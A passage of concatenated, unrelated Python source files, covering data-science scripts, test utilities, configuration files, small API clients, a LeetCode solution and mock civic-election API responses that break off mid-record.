Volatile acidity
Citric acid
Residual sugar
Chlorides
Free sulphur dioxide
Total sulphur dioxide
Density
pH
Sulphates
Alcohol
"""
# Importing the libraries
import numpy as np
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('winequality-red.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 11].values
# Deprecation warnings call for reshaping of single feature arrays with reshape(-1,1)
y = y.reshape(-1,1)
# avoid DataConversionError
y = y.astype(float)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)
y_test = sc_y.transform(y_test)"""
# Fitting Multiple Linear Regression to the Training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
# Predicting the Test set results
y_pred = regressor.predict(X_test)
# Building the optimal model using Backward Elimination
# consider p-value < 0.05
import statsmodels.formula.api as sm
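# statsmodels' OLS does not add an intercept automatically, so prepend a
# column of ones (winequality-red has 1599 samples)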
X = np.append(arr = np.ones((1599, 1)).astype(float), values = X, axis = 1)
X_opt = X[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'density'
X_opt = X[:, [0, 1, 2, 3, 4, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'fixed acidity'
X_opt = X[:, [0, 2, 3, 4, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'residual sugar'
X_opt = X[:, [0, 2, 3, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'citric acid'
X_opt = X[:, [0, 2, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'free sulphur dioxide'
X_opt = X[:, [0, 2, 5, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# hence the optimal model is now ready
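# The manual pass above can be automated. A minimal sketch, assuming X (with
# the intercept column) and y as defined earlier and the same statsmodels OLS
# API; 0.05 matches the significance level noted above. Unlike the manual
# pass, this sketch may also drop the intercept column.
def backward_elimination(X, y, significance_level=0.05):
    remaining = list(range(X.shape[1]))
    while True:
        ols = sm.OLS(endog=y, exog=X[:, remaining]).fit()
        p_values = np.asarray(ols.pvalues)
        worst = int(np.argmax(p_values))
        if p_values[worst] <= significance_level:
            return remaining, ols  # every remaining predictor is significant
        del remaining[worst]
X_opt_cols, regressor_OLS = backward_elimination(X, y)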
| python |
from mqtt_panel.web.component import Component
class Modal(Component):
def __init__(self):
super().__init__(4)
def _body(self, fh):
self._write_render(fh, '''\
<div id="modal" class="d-none"></div>
''', indent=self._indent)
| python |
from gym_gazebo2.envs.MARA.mara import MARAEnv
from gym_gazebo2.envs.MARA.mara_random import MARARandEnv
from gym_gazebo2.envs.MARA.mara_real import MARARealEnv
from gym_gazebo2.envs.MARA.mara_camera import MARACameraEnv
from gym_gazebo2.envs.MARA.mara_orient import MARAOrientEnv
from gym_gazebo2.envs.MARA.mara_collision import MARACollisionEnv
from gym_gazebo2.envs.MARA.mara_collision_orient import MARACollisionOrientEnv
| python |
# Dependencies
import requests as req
from config import api_key
url = f"http://www.omdbapi.com/?apikey={api_key}&t="
# Who was the director of the movie Aliens?
movie = req.get(url + "Aliens").json()
print("The director of Aliens was " + movie["Director"] + ".")
# What was the movie Gladiator rated?
movie = req.get(url + "Gladiator").json()
print("The rating of Gladiator was " + movie["Rated"] + ".")
# What year was 50 First Dates released?
movie = req.get(url + "50 First Dates").json()
print("The movie 50 First Dates was released in " + movie["Year"] + ".")
# Who wrote Moana?
movie = req.get(url + "Moana").json()
print("Moana was written by " + movie["Writer"] + ".")
# What was the plot of the movie Sing?
movie = req.get(url + "Sing").json()
print("The plot of Sing was: '" + movie["Plot"] + "'.")
# BONUS: Complete this activity with a loop.
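# One possible loop version (a sketch reusing the url above; the
# title-to-field mapping mirrors the questions answered one by one):
questions = {
    "Aliens": "Director",
    "Gladiator": "Rated",
    "50 First Dates": "Year",
    "Moana": "Writer",
    "Sing": "Plot",
}
for title, field in questions.items():
    movie = req.get(url + title).json()
    print(f"{title} -> {field}: {movie[field]}")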
| python |
"""Clean Code in Python - Chapter 9: Common Design Patterns
> Monostate Pattern
"""
from log import logger
class SharedAttribute:
def __init__(self, initial_value=None):
self.value = initial_value
self._name = None
def __get__(self, instance, owner):
if instance is None:
return self
if self.value is None:
raise AttributeError(f"{self._name} was never set")
return self.value
def __set__(self, instance, new_value):
self.value = new_value
def __set_name__(self, owner, name):
self._name = name
class GitFetcher:
current_tag = SharedAttribute()
current_branch = SharedAttribute()
def __init__(self, tag, branch=None):
self.current_tag = tag
self.current_branch = branch
def pull(self):
logger.info("pulling from %s", self.current_tag)
return self.current_tag
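# Usage sketch: SharedAttribute stores its value on the descriptor itself, so
# state is shared across all GitFetcher instances (the monostate effect):
#   f1 = GitFetcher("v0.1")
#   f2 = GitFetcher("v0.2")
#   f1.current_tag  # -> "v0.2", updated by f2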
| python |
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# ==============================================================================
import mxnet as mx
from unittest.mock import Mock
import os
import numpy as np
import zipfile
import random
import glob
MXNET_MODEL_ZOO_PATH = 'http://data.mxnet.io/models/imagenet/'
class RepurposerTestUtils:
ERROR_INCORRECT_INPUT = 'Test case assumes incorrect input'
VALIDATE_REPURPOSE_METHOD_NAME = '_validate_before_repurpose'
VALIDATE_PREDICT_METHOD_NAME = '_validate_before_predict'
LAYER_FC1 = 'fc1'
LAYER_RELU = 'relu1'
LAYER_FC2 = 'fc2'
LAYER_SOFTMAX = 'softmax'
ALL_LAYERS = [LAYER_FC1, LAYER_RELU, LAYER_FC2, LAYER_SOFTMAX]
META_MODEL_REPURPOSER_MODEL_HANDLER_CLASS = 'xfer.meta_model_repurposer.ModelHandler'
MNIST_MODEL_PATH_PREFIX = 'tests/data/test_mnist_model'
@staticmethod
def create_mxnet_module():
# Define an mxnet Module with 2 layers
data = mx.sym.Variable('data')
fc1 = mx.sym.FullyConnected(data, name=RepurposerTestUtils.LAYER_FC1, num_hidden=64)
relu1 = mx.sym.Activation(fc1, name=RepurposerTestUtils.LAYER_RELU, act_type="relu")
fc2 = mx.sym.FullyConnected(relu1, name=RepurposerTestUtils.LAYER_FC2, num_hidden=5)
out = mx.sym.SoftmaxOutput(fc2, name=RepurposerTestUtils.LAYER_SOFTMAX)
return mx.mod.Module(out)
@staticmethod
def get_mock_model_handler_object():
mock_model_handler = Mock()
mock_model_handler.layer_names = RepurposerTestUtils.ALL_LAYERS
return mock_model_handler
@staticmethod
def get_image_iterator():
image_list = [[0, 'accordion/image_0001.jpg'], [0, 'accordion/image_0002.jpg'], [1, 'ant/image_0001.jpg'],
[1, 'ant/image_0002.jpg'], [2, 'anchor/image_0001.jpg'], [2, 'anchor/image_0002.jpg']]
return mx.image.ImageIter(2, (3, 224, 224), imglist=image_list, path_root='tests/data/test_images',
label_name='softmax_label')
@staticmethod
def _assert_common_attributes_equal(repurposer1, repurposer2):
assert repurposer1.__dict__.keys() == repurposer2.__dict__.keys()
assert repurposer1._save_source_model_default == repurposer2._save_source_model_default
RepurposerTestUtils.assert_provide_equal(repurposer1.provide_data, repurposer2.provide_data)
RepurposerTestUtils.assert_provide_equal(repurposer1.provide_label, repurposer2.provide_label)
assert repurposer1.get_params() == repurposer2.get_params()
@staticmethod
def assert_provide_equal(provide1, provide2):
if provide1 is None:
assert provide2 is None
return
assert len(provide1) == len(provide2)
assert provide1[0][0] == provide2[0][0]
assert len(provide1[0][1]) == len(provide2[0][1])
@staticmethod
def _remove_files_with_prefix(prefix):
for filename in os.listdir('.'):
if filename.startswith(prefix):
os.remove(filename)
@staticmethod
def download_vgg19():
# Download vgg19 (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'vgg/vgg19-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'vgg/vgg19-symbol.json')]
@staticmethod
def download_squeezenet():
# Download squeezenet (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'squeezenet/squeezenet_v1.1-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'squeezenet/squeezenet_v1.1-symbol.json')]
@staticmethod
def download_resnet():
        # Download resnet (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'resnet/101-layers/resnet-101-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'resnet/101-layers/resnet-101-symbol.json')]
@staticmethod
def unzip_mnist_sample():
zip_ref = zipfile.ZipFile('tests/data/mnist_sample.zip', 'r')
zip_ref.extractall('.')
zip_ref.close()
@staticmethod
def create_img_iter(data_dir, batch_size, label_name='softmax_label'):
# assert dir exists
if not os.path.isdir(data_dir):
raise ValueError('Directory not found: {}'.format(data_dir))
# get class names
classes = [x.split('/')[-1] for x in glob.glob(data_dir+'/*')]
classes.sort()
fnames = []
labels = []
for c in classes:
# get all the image filenames and labels
images = glob.glob(data_dir+'/'+c+'/*')
images.sort()
fnames += images
labels += [c]*len(images)
# create imglist for ImageIter
imglist = []
for label, filename in zip(labels, fnames):
imglist.append([int(label), filename])
random.shuffle(imglist)
# make iterators
iterator = mx.image.ImageIter(batch_size, (3, 224, 224), imglist=imglist, label_name=label_name, path_root='')
return iterator
@staticmethod
def get_labels(iterator):
iterator.reset()
labels = []
while True:
try:
labels = labels + iterator.next().label[0].asnumpy().astype(int).tolist()
except StopIteration:
break
return labels
@staticmethod
def assert_feature_indices_equal(expected_feature_indices, actual_feature_indices):
if not type(expected_feature_indices) == type(actual_feature_indices):
raise AssertionError("Incorrect feature_indices type: {}. Expected: {}"
.format(type(actual_feature_indices), type(expected_feature_indices)))
if not expected_feature_indices.keys() == actual_feature_indices.keys():
raise AssertionError("Incorrect keys in feature_indices: {}. Expected: {}"
.format(actual_feature_indices.keys(), expected_feature_indices.keys()))
for key in expected_feature_indices:
if not np.array_equal(expected_feature_indices[key], actual_feature_indices[key]):
raise AssertionError("Incorrect values in feature_indices dictionary")
@staticmethod
def create_mnist_test_iterator():
# Create data iterator for mnist test images
return mx.io.MNISTIter(image='tests/data/t10k-images-idx3-ubyte', label='tests/data/t10k-labels-idx1-ubyte')
| python |
# Eyetracker type
# EYETRACKER_TYPE = "IS4_Large_Peripheral" # 4C eyetracker
#EYETRACKER_TYPE = "Tobii T120" # Old eyetracker
EYETRACKER_TYPE = "simulation" # test
# EYETRACKER_TYPE = "Tobii Pro X3-120 EPU" # Tobii X3
SCREEN_SIZE_X = 1920
SCREEN_SIZE_Y = 1080
#Pilot condition
PILOT_CONDITION_TEXT_INTERVENTION = True
PILOT_CONDITION_NO_REMOVAL = True
#PILOT_CONDITION_NO_REMOVAL = False
#PILOT mmd subset to load
#PILOT_MMD_SUBSET = [3,9,11,20,27,60,74] #try and ensure 74 is in removal
#PILOT_MMD_SUBSET = [5,28,30,62,66,72,76]
PILOT_MMD_SUBSET = [5]
# Project paths:
# Reference highlighting rules
#RUN USING: python -u experimenter_platform_stage_1_demo.py
if PILOT_CONDITION_TEXT_INTERVENTION:
USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight.db"
else:
USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight.db"
# GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_and_text.db"
if PILOT_CONDITION_TEXT_INTERVENTION:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_and_text_pilot_noremoval.db"
else:
if PILOT_CONDITION_NO_REMOVAL:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_pilot_noremoval_test.db"
else:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_pilot_removal.db"
# Project paths:
# Reference highlighting rules - SD testing
#RUN USING: python -u experimenter_platform_study_bars_SD.py
#USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight_SD.db"
#GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_SD_bold1.db"
# Legend highlighting rules
#RUN USING: python -u experimenter_platform_study_1.py
#GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_legend_highlighting.db"
#USER_MODEL_STATE_PATH = "./database/user_model_state_legend_highlighting.db"
FRONT_END_STATIC_PATH = "./application/frontend/static/"
FRONT_END_TEMPLATE_PATH = "./application/frontend/templates/"
# Platform configuration:
USE_FIXATION_ALGORITHM = True
USE_EMDAT = False
USE_ML = False
USE_KEYBOARD = False
USE_MOUSE = False
# Features to use
USE_PUPIL_FEATURES = True
USE_DISTANCE_FEATURES = True
USE_FIXATION_PATH_FEATURES = True
USE_TRANSITION_AOI_FEATURES = True
# Sets of features to keep
KEEP_TASK_FEATURES = False
KEEP_GLOBAL_FEATURES = False
#Frequency of ML/EMDAT calls:
EMDAT_CALL_PERIOD = 10000
ML_CALL_PERIOD = 6000000
# Some parameters from EMDAT
MAX_SEG_TIMEGAP = 10
# Fixation detector parameters
FIX_MAXDIST = 35
FIX_MINDUR = 100000
REST_PUPIL_SIZE = 0
PUPIL_ADJUSTMENT = "rpscenter"
# The amount of time to wait after starting a new task before starting recording
# fixations (to account for html loading time)
FIX_DETECTION_DELAY = 1000000
#Logs configuration
LOG_PREFIX = "./log/AdaptiveMSNV_log"
# Mouse events
MAX_DOUBLE_CLICK_DUR = 500000
| python |
#-
# Copyright (c) 2013 Robert M. Norton
# All rights reserved.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
# Register assignment:
# a0 - desired epc 1
# a1 - actual epc 1
# a2 - desired badvaddr 1
# a3 - actual badvaddr 1
# a4 - cause 1
# a5 - desired epc 2
# a6 - actual epc 2
# a7 - desired badvaddr 2
# s0 - actual badvaddr 2
# s1 - cause 2
class test_tlb_addrerr_store(BaseBERITestCase):
@attr('tlb')
def test_epc1(self):
self.assertRegisterEqual(self.MIPS.a0, self.MIPS.a1, "Wrong EPC 1")
@attr('tlb')
def test_badvaddr1(self):
'''Test BadVAddr after load from bad user space address'''
self.assertRegisterEqual(self.MIPS.a2, self.MIPS.a3, "Wrong badaddr 1")
@attr('tlb')
def test_cause1(self):
self.assertRegisterMaskEqual(self.MIPS.a4, 0xff, 0x14, "Wrong cause 1")
@attr('tlb')
def test_epc2(self):
self.assertRegisterEqual(self.MIPS.a5, self.MIPS.a6, "Wrong EPC 2")
@attr('tlb')
def test_badvaddr2(self):
'''Test BadVAddr after load from bad kernel space address'''
self.assertRegisterEqual(self.MIPS.a7, self.MIPS.s0, "Wrong badaddr 2")
@attr('tlb')
def test_cause2(self):
self.assertRegisterMaskEqual(self.MIPS.s1, 0xff, 0x14, "Wrong cause 2")
| python |
import os
import telebot
token = os.environ['TELEGRAM_TOKEN']
bot = telebot.TeleBot(token)
def medit(message_text,chat_id, message_id,reply_markup=None,parse_mode=None):
return bot.edit_message_text(chat_id=chat_id,message_id=message_id,text=message_text,reply_markup=reply_markup,
parse_mode=parse_mode)
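# Usage sketch (inside a message handler, assuming a received `message` object):
# medit("Updated text", message.chat.id, message.message_id, parse_mode="HTML")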
| python |
# -*- coding: utf-8 -*-
#
# Tencent is pleased to support the open source community by making QT4C available.
# Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
# QT4C is licensed under the BSD 3-Clause License, except for the third-party components listed below.
# A copy of the BSD 3-Clause License is included in this file.
#
'''QT4C(Client Driver for QTA)
'''
| python |
from spire.mesh import ModelController
from spire.schema import SchemaDependency
from platoon import resources
from platoon.models import *
class QueueController(ModelController):
resource = resources.Queue
version = (1, 0)
mapping = 'id subject name status'
model = Queue
schema = SchemaDependency('platoon')
def create(self, request, response, subject, data):
session = self.schema.session
subject = self.model.create(session, **data)
session.commit()
response({'id': subject.id})
def update(self, request, response, subject, data):
if not data:
return response({'id': subject.id})
session = self.schema.session
subject.update(session, **data)
session.commit()
response({'id': subject.id})
def _annotate_resource(self, request, model, resource, data):
endpoint = model.endpoint
if endpoint:
resource['endpoint'] = endpoint.extract_dict(exclude='id endpoint_id',
drop_none=True)
| python |
import argparse
import shutil
import errno
import time
import glob
import os
import cv2
import numpy as np
from merge_tools import do_merge_box
DEBUG = True
class MergeBox(object):
def __init__(self):
args = self.parse_arguments()
self.output_dir = args.output_dir
self.input_dir = args.input_dir
def parse_arguments(self):
"""
Parse the command line arguments of the program.
"""
parser = argparse.ArgumentParser(
description="生成labelme 格式数据"
)
parser.add_argument(
"-o",
"--output_dir",
type=str,
nargs="?",
help="输出文件的本地路径",
required=True
)
parser.add_argument(
"-i",
"--input_dir",
type=str,
nargs="?",
help="输入文件路径",
required=True
)
return parser.parse_args()
def parse_file_list(self, input_dir, output_dir):
"""
"""
label_file_list = glob.glob(os.path.join(input_dir, '*.txt'))
for label_file in label_file_list:
real_name = label_file.split('/')[-1].split('.')[0]
image_file = os.path.join(input_dir, "{}.jpg".format(real_name))
label_image_file = os.path.join(output_dir, "{}.jpg".format(real_name))
print(image_file)
if os.path.exists(image_file):
self.draw_box(label_file, image_file, label_image_file)
def draw_box(self, label_file, image_file, label_image_file):
if not os.path.exists(label_file) or not os.path.exists(image_file):
            print('[Warning] File does not exist --------file: {}'.format(label_file))
return
with open(label_file, 'r', encoding='utf-8') as f:
lines = f.readlines()
lines = do_merge_box(lines)
bg_image = cv2.imread(image_file)
raw_image = cv2.imread(image_file)
for index, line in enumerate(lines):
if len(line) < 8:
continue
points = line.split(',')
left = int(points[0]) if int(points[6]) > int(points[0]) else int(points[6])
right = int(points[2]) if int(points[4]) < int(points[2]) else int(points[4])
top = int(points[1]) if int(points[3]) > int(points[1]) else int(points[3])
bottom = int(points[5]) if int(points[7]) < int(points[5]) else int(points[7])
height = bottom - top
width = right - left
colors = (0, 0, 255)
if index == 189:
print(line)
print("left={} right={} top={} bottom={}".format(left, right, top, bottom))
# cv2.fillPoly(bg_image, [pts], (255, 255, 255))
roi_corners=np.array([[(int(points[0]), int(points[1])),
(int(points[2]), int(points[3])),
(int(points[4]), int(points[5])),
(int(points[6]), int(points[7]))]], dtype=np.int32)
            mask = np.zeros(bg_image.shape, dtype=np.uint8)  # zeros, so pixels outside the polygon end up 0
            channels = bg_image.shape[2]
            # coordinates of the input points
            channel_count = channels
            ignore_mask_color = (255,) * channel_count
            # build the mask layer
            cv2.fillPoly(mask, roi_corners, ignore_mask_color)
            # AND every pixel with the mask; everything outside the masked region becomes 0
            masked_image = cv2.bitwise_and(bg_image, mask)
c_img = masked_image[top: int(top + height), left: int(left + width)]
cv2.imwrite(os.path.join(self.output_dir, '{}.jpg'.format(index)), c_img)
            # draw the quadrilateral outline (each point is (x, y))
            pts = roi_corners.reshape((-1, 1, 2))
            cv2.polylines(bg_image, [pts], True, (0, 0, 255))
# cv2.rectangle(bg_image, (left, top), (left+width, top+height), colors, 1)
cv2.imwrite(label_image_file, bg_image)
        print('[Output] generated annotated image {}.'.format(label_image_file))
def main(self):
time_start = time.time()
# Argument parsing
args = self.parse_arguments()
if os.path.exists(args.output_dir):
shutil.rmtree(args.output_dir)
try:
os.makedirs(args.output_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.exists(args.input_dir):
print("输入路径不能为空 input_dir[{}] ".format(args.input_dir))
return
self.parse_file_list(args.input_dir, args.output_dir)
time_elapsed = time.time() - time_start
print('The code run {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
if __name__ == "__main__":
mergeBox = MergeBox()
mergeBox.main() | python |
"""Tests"""
import unittest
from html_classes_obfuscator import html_classes_obfuscator
class TestsGenerateCSS(unittest.TestCase):
"""Tests
Args:
unittest (unittest.TestCase): Unittest library
"""
def test_generate_css_simple_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello{color:blue}', {"hello": "test_1"})
expected_new_css = '.test_1{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_double_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello .world{color:blue}', {"hello": "test_1", "world": "test_2"})
expected_new_css = '.test_1 .test_2{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_tailwind_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css(r'.lg\:1\/4{color:blue}', {"lg:1/4": "test_1"})
expected_new_css = '.test_1{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_pseudo_elements_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello .world:not(.not_me, div){color:blue}', {"hello": "test_1", "world": "test_2", "not_me": "test_3"})
expected_new_css = '.test_1 .test_2:not(.test_3, div){color:blue}'
self.assertEqual(new_css, expected_new_css)
| python |
import urllib.request
def obtain_webpage(url: str):
return urllib.request.urlopen(url)
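# Usage sketch: the returned response is file-like and works as a context manager.
# with obtain_webpage("https://example.com") as response:
#     html = response.read().decode("utf-8")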
| python |
filepath = 'Prometheus_Unbound.txt'
with open(filepath) as fp:
line = fp.readline()
cnt = 1
while line:
print("Line {}: {}".format(cnt, line.strip()))
line = fp.readline()
cnt += 1
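# Equivalent idiomatic form (sketch): iterate the file object directly and
# let enumerate keep the line counter.
# with open(filepath) as fp:
#     for cnt, line in enumerate(fp, start=1):
#         print("Line {}: {}".format(cnt, line.strip()))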
| python |
# Time: O(nlogn)
# Space: O(n)
import collections
# hash, sort
class Solution(object):
def findWinners(self, matches):
"""
:type matches: List[List[int]]
:rtype: List[List[int]]
"""
lose = collections.defaultdict(int)
players_set = set()
for x, y in matches:
lose[y] += 1
players_set.add(x)
players_set.add(y)
        return [[x for x in sorted(players_set) if lose[x] == i] for i in range(2)]
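# Worked example:
# matches = [[1,3],[2,3],[3,6],[5,6],[5,7],[4,5],[4,8],[4,9],[10,4],[10,9]]
# players 1, 2 and 10 never lose, while 4, 5, 7 and 8 lose exactly once,
# so the result is [[1, 2, 10], [4, 5, 7, 8]]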
| python |
# flake8: noqa
elections_resp = {
'kind': 'civicinfo#electionsQueryResponse',
'elections': [{
'id': '2000',
'name': 'VIP Test Election',
'electionDay': '2021-06-06',
'ocdDivisionId': 'ocd-division/country:us'
}, {
'id': '4803',
'name': 'Los Angeles County Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:ca/county:los_angeles'
}, {
'id': '4804',
'name': 'Oklahoma Special Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:ok'
}, {
'id': '4810',
'name': 'Oregon County Special Elections',
'electionDay': '2019-05-21',
'ocdDivisionId': 'ocd-division/country:us/state:or'
}, {
'id': '4811',
'name': 'Los Angeles County Special Election',
'electionDay': '2019-06-04',
'ocdDivisionId': 'ocd-division/country:us/state:ca/county:los_angeles'
}, {
'id': '4823',
'name': '9th Congressional District Primary Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:nc/cd:9'
}]
}
voterinfo_resp = {
'kind': 'civicinfo#voterInfoResponse',
'election': {
'id': '2000',
'name': 'VIP Test Election',
'electionDay': '2021-06-06',
'ocdDivisionId': 'ocd-division/country:us'
},
'normalizedInput': {
'line1': '900 North Washtenaw Avenue',
'city': 'Chicago',
'state': 'IL',
'zip': '60622'
},
'pollingLocations': [{
'address': {
'locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'line1': '904 N WASHTENAW AVE',
'city': 'CHICAGO',
'state': 'IL',
'zip': '60622'
},
'notes': '',
'pollingHours': '',
'sources': [{
'name': 'Voting Information Project',
'official': True
}]
}],
'contests': [{
'type': 'General',
'office': 'United States Senator',
'level': ['country'],
'roles': ['legislatorUpperBody'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'James D. "Jim" Oberweis',
'party': 'Republican',
'candidateUrl': 'http://jimoberweis.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/Oberweis2014'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Oberweis2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCOVqW3lh9q9cnk-R2NedLTw'
}]
}, {
'name': 'Richard J. Durbin',
'party': 'Democratic',
'candidateUrl': 'http://www.dickdurbin.com/home',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/dickdurbin'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/DickDurbin'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/SenatorDickDurbin'
}]
}, {
'name': 'Sharon Hansen',
'party': 'Libertarian',
'candidateUrl': 'http://www.sharonhansenforussenate.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/USSenate2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/nairotci'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'US House of Representatives - District 7',
'level': ['country'],
'roles': ['legislatorLowerBody'],
'district': {
'name': "Illinois's 7th congressional district",
'scope': 'congressional',
'id': 'ocd-division/country:us/state:il/cd:7'
},
'candidates': [{
'name': 'Danny K. Davis',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/dkdforcongress'
}]
}, {
'name': 'Robert L. Bumpers',
'party': 'Republican'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Governor/ Lieutenant Governor',
'level': ['administrativeArea1'],
'roles': ['headOfGovernment'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Bruce Rauner/ Evelyn Sanguinetti',
'party': 'Republican',
'candidateUrl': 'http://brucerauner.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/BruceRauner'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/BruceRauner'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/117459818564381220425'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/brucerauner'
}]
}, {
'name': 'Chad Grimm/ Alexander Cummings',
'party': 'Libertarian',
'candidateUrl': 'http://www.grimmforliberty.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/grimmforgovernor'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/GrimmForLiberty'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/118063028184706045944'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UC7RjCAp7oAGM8iykNl5aCsQ'
}]
}, {
'name': 'Pat Quinn/ Paul Vallas',
'party': 'Democratic',
'candidateUrl': 'https://www.quinnforillinois.com/00/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/quinnforillinois'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/quinnforil'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/QuinnForIllinois'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Comptroller',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Judy Baar Topinka',
'party': 'Republican',
'candidateUrl': 'http://judybaartopinka.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/153417423039'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/ElectTopinka'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/118116620949235387993'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCfbQXLS2yrY1wAJQH2oq4Kg'
}]
}, {
'name': 'Julie Fox',
'party': 'Libertarian',
'candidateUrl': 'http://juliefox2014.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/154063524725251'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/JulieFox1214'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/+Juliefox2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCz2A7-6e0_pJJ10bXvBvcIA'
}]
}, {
'name': 'Sheila Simon',
'party': 'Democratic',
'candidateUrl': 'http://www.sheilasimon.org',
'channels': [{
